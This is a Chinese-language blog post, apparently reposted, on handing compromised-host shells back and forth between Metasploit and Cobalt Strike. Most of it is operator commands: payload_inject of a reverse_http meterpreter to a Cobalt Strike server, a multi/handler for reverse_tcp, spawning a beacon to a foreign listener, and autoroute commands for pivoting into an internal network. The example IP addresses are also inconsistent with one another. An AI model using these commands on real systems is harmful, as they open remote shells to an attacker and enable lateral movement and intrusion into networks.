美文网首页
metasploit与Cobaltstrike互相派生shell

metasploit与Cobaltstrike互相派生shell

作者: migrate_ | 来源:发表于2020-04-10 15:11 被阅读0次

一. msf 派生 shell 给 Cobalt strike(前提有一个meterpreter)

  • 被控端win7(64) ip:192.168.66.133
  • kali linux > msf ip:192.168.66.152
  • cobalt strike ip: 公网ip
msf exploit(handler) >  use exploit/windows/local/payload_inject
  msf exploit(payload_inject) >  set PAYLOAD windows/meterpreter/reverse_http
  msf exploit(payload_inject) > set DisablePayloadHandler true
  msf exploit(payload_inject) > set LHOST 192.168.229.143
  msf exploit(payload_inject) > set LPORT 1212
  msf exploit(payload_inject) > set SESSION 1
  msf exploit(payload_inject) > exploit

二. Cobalt strike 派生 shell 给 MSF(前提有个beaconshell)

msf > use exploit/multi/handler 
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.66.152 #msf ip
lhost => 192.168.1.100
msf exploit(handler) > set lport 5555 #msf port
lport => 5555
msf exploit(handler) > exploit
1.jpg

之后使用Cobalt Strike创建一个

windows/foreign/reverse_tcp Listener

其中ip为msf的ip地址,端口为msf所监听的端口。
然后选中计算机,右键->Spawn,选择刚刚创建的监听器:
msf中即可看到成功获取了meterpreter会话


2.jpg
3.jpg 
run get_local_subnets
#获取内网网段
run autoroute -s 192.168.66.0/24
#添加路由
run autoroute -p
#查看添加的路由
#接下来就可以进行内网渗透了

相关文章

网友评论

      本文标题:metasploit与Cobaltstrike互相派生shell

      本文链接:https://www.haomeiwen.com/subject/dvvlmhtx.html

      延伸阅读

      深度阅读

      • 您也可以注册成为美文阅读网的作者,发表您的原创作品、分享您的心情!

      栏目导航

      热点阅读

      关于我们|服务条款|联系我们|metasploit与Cobaltstrike互相派生shell|投稿指南|网站地图|RSS订阅|排版工具|手机版

      提供经典美文摘抄,优美散文欣赏,现代诗歌精选,短篇小说,心情随笔,表白情书范文,故事会在线阅读欣赏

      Copyright © 2014-2023 Haomeiwen.com All Rights Reserved. 好美文阅读网 版权所有

      备案信息:桂公网安备 45052102000051号 · 桂ICP备13007215号-3

      本站所收录作品、热点评论等信息部分来源互联网,目的只是为了系统归纳学习和传递资讯

      所有作品版权归原创作者所有,与本站立场无关,如不慎侵犯了你的权益,请联系我们告知,我们将做删除处理!